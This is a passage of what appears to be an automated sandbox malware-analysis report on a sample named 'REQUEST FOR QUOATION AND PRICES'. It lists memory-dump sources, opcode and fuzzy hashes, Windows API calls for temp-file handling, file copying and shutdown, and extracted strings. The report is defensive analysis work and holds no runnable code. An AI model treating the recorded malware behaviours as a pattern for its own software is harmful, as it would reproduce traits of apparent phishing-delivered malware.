                                                                                                                                • Instruction ID: 652ea94e3f5389adfc611d8e4356cf6de8f26b77a3edf0eadf997c662a2c1397
                                                                                                                                • Opcode Fuzzy Hash: 8cff5e2566d0e4a1d2a36279443effaf42ecb59afe2effea99325aac2af07e09
                                                                                                                                • Instruction Fuzzy Hash: C2018071B00A118FD324DF6EC440916B7F6AF9A25431585BAE009DB332EB71ED46DB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3f1ca75961f721f87e892f654bba0c5cf4b2bcb1dbec6171f87f2ac73de71e31
                                                                                                                                • Instruction ID: acf59e58fcd2fa8658fa85873894fad275ad7c376f37ec7d5b906ea69f370c30
                                                                                                                                • Opcode Fuzzy Hash: 3f1ca75961f721f87e892f654bba0c5cf4b2bcb1dbec6171f87f2ac73de71e31
                                                                                                                                • Instruction Fuzzy Hash: 230180307406118FD324DF6ED44091ABBF6EF8A354315856AE005CB335DB71EC469B80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ed7c97bc11ab14bde1f17bc500f6251101efe293f3aee4eae97f12a3f3f47f43
                                                                                                                                • Instruction ID: a8b521d46eb4ecb3c0e5b0350f0c4819b289c378c426db2452819563aabb3641
                                                                                                                                • Opcode Fuzzy Hash: ed7c97bc11ab14bde1f17bc500f6251101efe293f3aee4eae97f12a3f3f47f43
                                                                                                                                • Instruction Fuzzy Hash: 9E017434D11608CFDB50DFA4D8546EEBBB1EF8A311F90A439C810BB290DF3A5952CB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 85b1741a131a98a7b3a4cf2b6f54f360f221dd28a4aa25620c5155bb5a8e2730
                                                                                                                                • Instruction ID: 11f4ac41b37c37d0f64f29f99d12162f70c0b9b9cd8687331292518cc6057c14
                                                                                                                                • Opcode Fuzzy Hash: 85b1741a131a98a7b3a4cf2b6f54f360f221dd28a4aa25620c5155bb5a8e2730
                                                                                                                                • Instruction Fuzzy Hash: 98F0F430E283489FDB10AFA4C840BAE7BF5FF84310F11452AE4049B744CB72A549CBD2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 34d8034a9431b02450eb1d707788cbb1057b8c60d76f8e6698be00672fd3924d
                                                                                                                                • Instruction ID: 4f5d9d4e7be2d69a61aae25e5afc45d26fd06da6feceab4791d216eca8764fc3
                                                                                                                                • Opcode Fuzzy Hash: 34d8034a9431b02450eb1d707788cbb1057b8c60d76f8e6698be00672fd3924d
                                                                                                                                • Instruction Fuzzy Hash: FAF08734D11208CFDB44DFA9D8046EDB7B1FF8A301F519429C800B7350DB3A5852CB60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 13b037cce4798db27e4eb95376808ce0ca73130a9742ab929508885024c9bfe2
                                                                                                                                • Instruction ID: 35898149a38885f8c586e8e864d6c9f0670fdadbf00fc01cc161b9a618c06afd
                                                                                                                                • Opcode Fuzzy Hash: 13b037cce4798db27e4eb95376808ce0ca73130a9742ab929508885024c9bfe2
                                                                                                                                • Instruction Fuzzy Hash: 59F02020B64305ABF62032B94840B2F6AAAAFC4692F55003AF200CF240DED19C0703E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6ae29f25194aab652d70cd23623f99adecc01a1959af6729f2a17fb6a4a67d58
                                                                                                                                • Instruction ID: 3670968725628edcf7edfac42bc23c62ad920fd957775e2601aca52d296cb066
                                                                                                                                • Opcode Fuzzy Hash: 6ae29f25194aab652d70cd23623f99adecc01a1959af6729f2a17fb6a4a67d58
                                                                                                                                • Instruction Fuzzy Hash: 15F02720B183016BE32126795861B6F7ABAAFC4685F55403AE544CF285DFA19D0743E2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c2e1393244dee5f70735e0fb743ea0d46b77fa27fdc89104bfbdefd72fb25ad4
                                                                                                                                • Instruction ID: cdf05fa26d422c756de270744325513c878e0a4c14ce168ff909094bab3c1efd
                                                                                                                                • Opcode Fuzzy Hash: c2e1393244dee5f70735e0fb743ea0d46b77fa27fdc89104bfbdefd72fb25ad4
                                                                                                                                • Instruction Fuzzy Hash: B4F06C3600414EBFCF039F90CD00CC97FB6EF0A258B4A9092FA488A532D336D9A4EB51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 265e40de9353cc3aae190a0637974745befbe09e10a6bf55bb286d3b76fa6548
                                                                                                                                • Instruction ID: 55359a42867cd0eb0fe7ad3c2443e570cfb90308ed28d589bace403d5ff6ef65
                                                                                                                                • Opcode Fuzzy Hash: 265e40de9353cc3aae190a0637974745befbe09e10a6bf55bb286d3b76fa6548
                                                                                                                                • Instruction Fuzzy Hash: 67D0C93255DBD04FD722873584959893FB05F5B214B1946EAD086CFAB3C5969906CB02
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 35b71442939b6d34381d06dfbd1a964c3c4f47e2fe46d28880bc324c2e1d8a8a
                                                                                                                                • Instruction ID: faa2ec78a96413ab5dd4b9e9671411ab8965a45badc6086984f46588e44253d1
                                                                                                                                • Opcode Fuzzy Hash: 35b71442939b6d34381d06dfbd1a964c3c4f47e2fe46d28880bc324c2e1d8a8a
                                                                                                                                • Instruction Fuzzy Hash: 2FD0A73250C7E04FD323833A7814599BFB58EC756070A49EFD0C9DB15695412D0EC7A7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0845a4e072c87591c4b0b1e734278ecb7900ed2b09660d2deb2aaf6d9f89d16c
                                                                                                                                • Instruction ID: 883aa4bebb694eedc366f8189396b9c29dfda39e2254e7ec270f186ad91cd175
                                                                                                                                • Opcode Fuzzy Hash: 0845a4e072c87591c4b0b1e734278ecb7900ed2b09660d2deb2aaf6d9f89d16c
                                                                                                                                • Instruction Fuzzy Hash: 1DC08032754720475224525E7C44D8E9F658EC5661745CF3BF008DF1049D915D4F41DB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8f2c883e3b726e8a5f4ad9ecbf0f4310f6a90774a05df05d5b41f33465be788b
                                                                                                                                • Instruction ID: be527a007ce0e1befe9b24973ceff2e1a6dfa26634c61455117f0349a29ab115
                                                                                                                                • Opcode Fuzzy Hash: 8f2c883e3b726e8a5f4ad9ecbf0f4310f6a90774a05df05d5b41f33465be788b
                                                                                                                                • Instruction Fuzzy Hash: 5EC08C70410F098BF2042F54BC1CB39B3B8B707303FC42D10E20E028708BB94854C648
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 28683c939ca9916be0358e3719cf3bca2fe9a18f1f7c66a3945e926afaf2ee03
                                                                                                                                • Instruction ID: cd66823fc60fb43d22b79bb15ce87b48b1c80bbd5b3d1d82ff91a81c18377df7
                                                                                                                                • Opcode Fuzzy Hash: 28683c939ca9916be0358e3719cf3bca2fe9a18f1f7c66a3945e926afaf2ee03
                                                                                                                                • Instruction Fuzzy Hash: D9C08C302B4304CFF200AA5CC584B4537ECEF89B08F2018A1F4048F621CB62FC144A45
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                                • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                • String ID: $M$N
                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                • Opcode ID: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                                                • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                                • Opcode Fuzzy Hash: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                                                • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
                                                                                                                                APIs
                                                                                                                                • #17.COMCTL32 ref: 00403379
                                                                                                                                • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                                  • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                  • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                  • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                                  • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                                                • CharNextW.USER32(00000000,00434000,00000020), ref: 00403402
                                                                                                                                • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 0040350B
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351C
                                                                                                                                • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403528
                                                                                                                                • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353C
                                                                                                                                • lstrcatW.KERNEL32(00436800,Low), ref: 00403544
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403555
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355D
                                                                                                                                • DeleteFileW.KERNEL32(00436000), ref: 00403571
                                                                                                                                • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                                                • ExitProcess.KERNEL32 ref: 00403641
                                                                                                                                • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364D
                                                                                                                                • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403659
                                                                                                                                • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403665
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366C
                                                                                                                                • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                                                • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036DA
                                                                                                                                • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                                                • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                • API String ID: 4107622049-1875889550
                                                                                                                                • Opcode ID: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                                                • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                                                • Opcode Fuzzy Hash: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                                                • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNEL32(?,?,00436800,771B2EE0,00434000), ref: 0040579B
                                                                                                                                • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,771B2EE0,00434000), ref: 004057E3
                                                                                                                                • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,771B2EE0,00434000), ref: 00405806
                                                                                                                                • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,771B2EE0,00434000), ref: 0040580C
                                                                                                                                • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,771B2EE0,00434000), ref: 0040581C
                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                • String ID: \*.*
                                                                                                                                • API String ID: 2035342205-1173974218
                                                                                                                                • Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                                                • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                                • Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                                                • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                                                • API String ID: 0-4082700204
                                                                                                                                • Opcode ID: beac64d6cdd0465a9169bf2f0fcbbe7277d532ef6a6ce5006603c53e992e236a
                                                                                                                                • Instruction ID: 04e7425ff9aca1697b388117102e2617fb8533b038cf312be2d47d4b65a0ee67
                                                                                                                                • Opcode Fuzzy Hash: beac64d6cdd0465a9169bf2f0fcbbe7277d532ef6a6ce5006603c53e992e236a
                                                                                                                                • Instruction Fuzzy Hash: DB3290B4E10228CFEB64CF65C944B9DBBB2BF89304F2081A9D809AB351DB755E85CF11
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558154165.0000000036DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DF0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36df0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                                                • API String ID: 0-4082700204
                                                                                                                                • Opcode ID: a3b057461e692f5cbad3c8ffe49aca1c173ffd9dba5232f9856b3243610e67de
                                                                                                                                • Instruction ID: 47f997f5b8e82422d4ce38547cb5f9adb0c282e7d14f8ec3c9cf3dce6381e4d6
                                                                                                                                • Opcode Fuzzy Hash: a3b057461e692f5cbad3c8ffe49aca1c173ffd9dba5232f9856b3243610e67de
                                                                                                                                • Instruction Fuzzy Hash: F90290B4E012188FEB68CF65D954BDDBBB2BF89300F2081A9D849AB351DB755E85CF10
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                                                • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,771B2EE0,00405792,?,00436800,771B2EE0), ref: 00406238
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2533024279.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 0000000A.00000002.2532989816.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533071298.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533102279.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 0000000A.00000002.2533140893.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                • String ID: WB
                                                                                                                                • API String ID: 2295610775-2854515933
                                                                                                                                • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
